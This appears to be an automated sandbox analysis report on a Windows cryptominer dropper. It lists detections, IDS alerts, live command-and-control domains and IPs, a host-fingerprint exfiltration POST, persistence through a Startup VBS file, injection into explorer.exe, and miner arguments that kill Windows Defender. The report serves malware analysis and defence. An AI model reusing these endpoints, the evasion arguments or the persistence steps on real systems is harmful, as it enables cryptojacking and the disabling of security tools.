                  2024-12-16T13:41:31.619715+010020362892Crypto Currency Mining Activity Detected192.168.2.7584031.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-16T13:41:20.026422+010020542471A Network Trojan was detected154.216.20.243443192.168.2.749722TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-16T13:41:22.119408+010020446971A Network Trojan was detected192.168.2.749728154.216.20.243443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-16T13:42:18.947606+010020510042Crypto Currency Mining Activity Detected192.168.2.749839154.216.20.243443TCP
                  2024-12-16T13:43:18.740688+010020510042Crypto Currency Mining Activity Detected192.168.2.749956154.216.20.243443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: ZppxPm0ASs.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeAvira: detection malicious, Label: HEUR/AGEN.1304644
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeReversingLabs: Detection: 28%
                  Multi AV Scanner detection for submitted file
                  Source: ZppxPm0ASs.exeReversingLabs: Detection: 28%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: ZppxPm0ASs.exeJoe Sandbox ML: detected

                  Bitcoin Miner

                  barindex
                  Yara detected Xmrig cryptocurrency miner
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2868, type: MEMORYSTR
                  Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.7:49750 version: TLS 1.2
                  Source: ZppxPm0ASs.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.2821462195.000001FDF361E000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.2821462195.000001FDF361E000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.1447439189.000001FDD9E10000.00000004.08000000.00040000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1911085793.0000016D11EB1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.1447439189.000001FDD9E10000.00000004.08000000.00040000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1911085793.0000016D11EB1000.00000004.00000800.00020000.00000000.sdmp

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 154.216.20.243:443 -> 192.168.2.7:49722
                  Source: Network trafficSuricata IDS: 2044697 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 : 192.168.2.7:49728 -> 154.216.20.243:443
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\explorer.exeNetwork Connect: 5.188.137.200 3333Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 154.216.20.243 443Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 185.157.162.216 4444Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.7:49720 -> 5.188.137.200:3333
                  Source: global trafficTCP traffic: 192.168.2.7:49734 -> 185.157.162.216:4444
                  Source: global trafficHTTP traffic detected: GET /77/uploads/Odavmyskfc.pdf HTTP/1.1Host: woo097878781.winConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /77/uploads/Odavmyskfc.pdf HTTP/1.1Host: woo097878781.winConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 5.188.137.200 5.188.137.200
                  Source: Joe Sandbox ViewIP Address: 185.157.162.216 185.157.162.216
                  Source: Joe Sandbox ViewIP Address: 154.216.20.243 154.216.20.243
                  Source: Joe Sandbox ViewASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.7:54730 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.7:58403 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.7:49839 -> 154.216.20.243:443
                  Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.7:49956 -> 154.216.20.243:443
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /77/uploads/Odavmyskfc.pdf HTTP/1.1Host: woo097878781.winConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /P.txt HTTP/1.1Accept: */*Connection: closeHost: woo097878781.winUser-Agent: cpp-httplib/0.12.6
                  Source: global trafficHTTP traffic detected: GET /77/uploads/Odavmyskfc.pdf HTTP/1.1Host: woo097878781.winConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: woo097878781.win
                  Source: global trafficDNS traffic detected: DNS query: pool.hashvault.pro
                  Source: unknownHTTP traffic detected: POST /66/api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 336Content-Type: application/jsonHost: woo097878781.winUser-Agent: cpp-httplib/0.12.6
                  Source: powershell.exe, 00000008.00000002.1453345407.000002225ED46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m:B
                  Source: powershell.exe, 00000008.00000002.1432829442.0000022256C15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000008.00000002.1408857314.0000022246DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000008.00000002.1408857314.0000022246DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: ZppxPm0ASs.exe, 00000000.00000002.1449279227.000001FDD9E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1408857314.0000022246BA1000.00000004.00000800.00020000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1762727004.0000016D019E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000008.00000002.1408857314.0000022246DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 00000008.00000002.1408857314.0000022246DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000008.00000002.1453345407.000002225ED46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                  Source: powershell.exe, 00000008.00000002.1453345407.000002225ED46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.U~
                  Source: powershell.exe, 00000008.00000002.1453345407.000002225ED46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.Y
                  Source: powershell.exe, 00000008.00000002.1453345407.000002225ED46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                  Source: powershell.exe, 00000008.00000002.1453345407.000002225ED46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coE
                  Source: powershell.exe, 00000008.00000002.1408857314.0000022246BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000008.00000002.1432829442.0000022256C15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000008.00000002.1432829442.0000022256C15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000008.00000002.1432829442.0000022256C15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000008.00000002.1408857314.0000022246DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.1447439189.000001FDD9E10000.00000004.08000000.00040000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1911085793.0000016D11EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.1447439189.000001FDD9E10000.00000004.08000000.00040000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1911085793.0000016D11EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.1447439189.000001FDD9E10000.00000004.08000000.00040000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1911085793.0000016D11EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: powershell.exe, 00000008.00000002.1432829442.0000022256C15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.1447439189.000001FDD9E10000.00000004.08000000.00040000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1911085793.0000016D11EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.1447439189.000001FDD9E10000.00000004.08000000.00040000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.1449279227.000001FDD9F41000.00000004.00000800.00020000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1762727004.0000016D01AB1000.00000004.00000800.00020000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1911085793.0000016D11EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.1447439189.000001FDD9E10000.00000004.08000000.00040000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1911085793.0000016D11EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: ZppxPm0ASs.exe, 00000000.00000002.1449279227.000001FDD9E71000.00000004.00000800.00020000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1762727004.0000016D019E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win
                  Source: explorer.exe, 00000015.00000003.1468234175.000000000138B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001306000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057546756.000000000138B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488372794.0000000001385000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488547694.000000000138B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1436229581.0000000001325000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488436728.0000000001386000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1468279607.0000000001392000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488587370.0000000001390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.php
                  Source: explorer.exe, 00000015.00000003.2057546756.000000000138B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488372794.0000000001385000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488547694.000000000138B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488436728.0000000001386000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488587370.0000000001390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.php$
                  Source: explorer.exe, 00000015.00000002.2907055074.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.php--cinit-version=3.4.1--nicehash--tls--cinit-idle-wait=5-
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.phpEZ
                  Source: explorer.exe, 00000015.00000002.2907055074.00000000012C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.phpds
                  Source: explorer.exe, 00000015.00000003.1436229581.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.phptjalvjhtgxjbffgq
                  Source: ZppxPm0ASs.exe, 00000000.00000002.1449279227.000001FDD9E71000.00000004.00000800.00020000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1762727004.0000016D019E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/77/uploads/Odavmyskfc.pdf
                  Source: explorer.exe, 00000015.00000003.1488587370.0000000001390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/P.txt
                  Source: explorer.exe, 00000015.00000002.2907055074.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/P.txt--cinit-kill-targets=msmpeng.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/P.txt0
                  Source: explorer.exe, 00000015.00000003.2056823251.0000000003910000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2056823251.0000000003900000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2909218782.0000000003900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/P.txtC:
                  Source: explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/P.txtTEM
                  Source: explorer.exe, 00000015.00000002.2909218782.0000000003830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/P.txteC:
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                  Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.7:49750 version: TLS 1.2

                  System Summary

                  barindex
                  Uses powercfg.exe to modify the power settings
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeFile created: C:\Users\user~1\AppData\Local\Temp\lkpwsyczzfuj.sysJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeCode function: 0_2_00007FFAAC460F080_2_00007FFAAC460F08
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeCode function: 0_2_00007FFAAC4614150_2_00007FFAAC461415
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeCode function: 0_2_00007FFAAC62F1350_2_00007FFAAC62F135
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeCode function: 0_2_00007FFAAC6231F20_2_00007FFAAC6231F2
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeCode function: 0_2_00007FFAAC63041D0_2_00007FFAAC63041D
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeCode function: 0_2_00007FFAAC626C800_2_00007FFAAC626C80
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeCode function: 0_2_00007FFAAC621D150_2_00007FFAAC621D15
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeCode function: 0_2_00007FFAAC6208A00_2_00007FFAAC6208A0
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeCode function: 0_2_00007FFAAC6208900_2_00007FFAAC620890
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeCode function: 0_2_00007FFAAC6249FA0_2_00007FFAAC6249FA
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeCode function: 0_2_00007FFAAC626A680_2_00007FFAAC626A68
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeCode function: 23_2_00007FFAAC450F0823_2_00007FFAAC450F08
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeCode function: 23_2_00007FFAAC45141523_2_00007FFAAC451415
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeCode function: 23_2_00007FFAAC61F13523_2_00007FFAAC61F135
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeCode function: 23_2_00007FFAAC6131F223_2_00007FFAAC6131F2
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeCode function: 23_2_00007FFAAC6109E023_2_00007FFAAC6109E0
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeCode function: 23_2_00007FFAAC62041D23_2_00007FFAAC62041D
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeCode function: 23_2_00007FFAAC616C8023_2_00007FFAAC616C80
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeCode function: 23_2_00007FFAAC611D1523_2_00007FFAAC611D15
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeCode function: 23_2_00007FFAAC6108A023_2_00007FFAAC6108A0
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeCode function: 23_2_00007FFAAC61089023_2_00007FFAAC610890
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeCode function: 23_2_00007FFAAC6149FA23_2_00007FFAAC6149FA
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeCode function: 23_2_00007FFAAC616A6823_2_00007FFAAC616A68
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\lkpwsyczzfuj.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                  Source: ZppxPm0ASs.exeStatic PE information: invalid certificate
                  Source: IsStopped.exe.0.drStatic PE information: No import functions for PE file found
                  Source: ZppxPm0ASs.exeStatic PE information: No import functions for PE file found
                  Source: ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs ZppxPm0ASs.exe
                  Source: ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZibyiy.exe. vs ZppxPm0ASs.exe
                  Source: ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ZppxPm0ASs.exe
                  Source: ZppxPm0ASs.exe, 00000000.00000000.1241860841.000001FDD8166000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZibyiy.exe. vs ZppxPm0ASs.exe
                  Source: ZppxPm0ASs.exe, 00000000.00000002.1447439189.000001FDD9E10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs ZppxPm0ASs.exe
                  Source: ZppxPm0ASs.exe, -.csCryptographic APIs: 'CreateDecryptor'
                  Source: IsStopped.exe.0.dr, -.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.ZppxPm0ASs.exe.1fdea5b3ec8.6.raw.unpack, -.csCryptographic APIs: 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.spyw.expl.evad.mine.winEXE@38/9@3/3
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4692:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2712:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5092:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5528:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agufqnc2.poy.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbs"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\explorer.exeJump to behavior
                  Source: ZppxPm0ASs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: ZppxPm0ASs.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
